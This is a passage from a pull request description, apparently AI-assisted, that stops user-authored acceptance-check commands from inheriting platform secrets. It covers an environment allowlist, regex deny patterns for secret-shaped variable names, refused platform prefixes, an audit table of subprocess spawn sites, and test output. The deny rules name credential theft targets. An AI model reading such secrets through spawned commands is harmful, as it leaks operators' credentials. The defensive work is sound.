(`/(SECRET|TOKEN|KEY|PASSWORD|PASSWD|CREDENTIAL|DSN|DATABASE_URL|CONNECTION)/i`)
is dropped even if allowlisted, and a credential-bearing URL value
(`http://user:pw@proxy`) is dropped even from an allowlisted proxy variable —
so widening the allowlist later cannot silently reopen the hole.

**4. Platform-owned configuration is never grantable.** Without this, the
opt-in escape hatch would re-open the vulnerability with one extra field
(`envPassthrough: ['PLATFORM_ENCRYPTION_KEY']`). Names under
`DATABASE_`/`PLATFORM_`/`PLUGIN_`/`TRIGGER_`/`AUTH_`/`BETTER_AUTH_`/
`EVER_WORKS_`/`SMTP_`/`RESEND_`/`STRIPE_`/`SENTRY_`/`POSTHOG_`/… are refused by
both paths.

No behaviour change for legitimate checks: `pnpm build` / `pnpm test` see the
same `PATH`, `HOME`, `NODE_ENV`, locale, temp dirs and toolchain roots they saw
before.

## Other spawn sites audited

Grepped `spawn(` / `exec(` / `execFile(` under `packages/agent`,
`packages/tasks`, `packages/plugins/sandbox-workspace`,
`packages/plugins/local-workspace` (and the neighbouring runners):

| Site | Verdict |
| --- | --- |
| `packages/agent/src/tasks-domain/task-gate-runner.service.ts` | **VULNERABLE — fixed here.** User-authored command, `shell: true`, full inherited env. |
| `packages/plugins/sandbox-workspace/src/sandbox-workspace.plugin.ts` (`git`) | OK — fixed binary + argv array, no shell; the injected token is what the operation needs. |
| `packages/plugins/local-workspace/src/local-workspace.plugin.ts` (`git`) | OK — same shape. |
| `packages/agent/src/services/knowledge-base-media-normalize.service.ts` (`ffmpeg`) | OK — fixed binary, argv array, no shell, no user-authored command. |
| `packages/plugin/src/code-edit/helpers.ts` (`git status --porcelain`) | OK — literal command, no interpolation. |
| `packages/tasks/.../terminal-session-host.ts` → `pty-local` plugin | OK — already scrubbed by construction: the child env is exactly the caller-supplied `spec.env` (`{ ...input.env }`), never `process.env`. |
| `packages/plugins/{claude-code,codex,gemini,opencode,hermes-agent}/src/utils/process-runner.ts` | OK — already allowlist-scrubbed (`buildSubprocessEnv`, audit C-10). |
| `packages/plugins/github-storage/src/lfs-cli.ts` | OK — explicit env, documented as "never a `...process.env` spread". |

## Verification (real output)

```
$ cd packages/agent && pnpm build
>  TSC  Found 0 issues.
>  SWC  Running...
Successfully compiled: 1073 files with swc

$ npx jest --testPathPattern="task-gate-runner|check-env"
PASS src/tasks-domain/__tests__/check-env.spec.ts (15.325 s)
PASS src/tasks-domain/__tests__/task-gate-runner.service.spec.ts (48.753 s)
Test Suites: 2 passed, 2 total
Tests:       43 passed, 43 total

$ pnpm build --filter=ever-works-api
ever-works-api:build: >  TSC  Found 0 issues.
 Tasks:    14 successful, 14 total

$ cd apps/api && pnpm generate:openapi
Wrote OpenAPI spec (439 paths) to apps/api/openapi.json     # not committed
```

26 new tests (18 unit + 8 real-subprocess), including: a parent secret is
invisible to the child (`node -e` prints its own env), the secret NAMES are
absent from the child key list, `PATH` survives so commands resolve, an
explicit grant works, the same variable is absent without the grant, a
platform-owned name stays refused even when granted, a secret-shaped name is
blocked even when allowlisted, credential-URL stripping, Windows-critical vars
present on win32, and an "attacker" check that greps its own environment for
the sentinel and finds nothing.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added optional environment-variable passthrough for acceptance checks, allowing explicitly approved variable names to be made available.
  * Added validation and limits for passthrough entries.

* **Security**
  * Acceptance checks now run with a restricted environment that excludes platform credentials, secrets, and credential-bearing values.
  * Preserved required runtime settings and safe defaults such as `PATH` and `CI`.
  * Blocked unsafe or platform-owned variables, including when explicitly requested.

* **Tests**
  * Added comprehensive coverage for environment filtering, passthrough behavior, platform differences, and secret protection.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->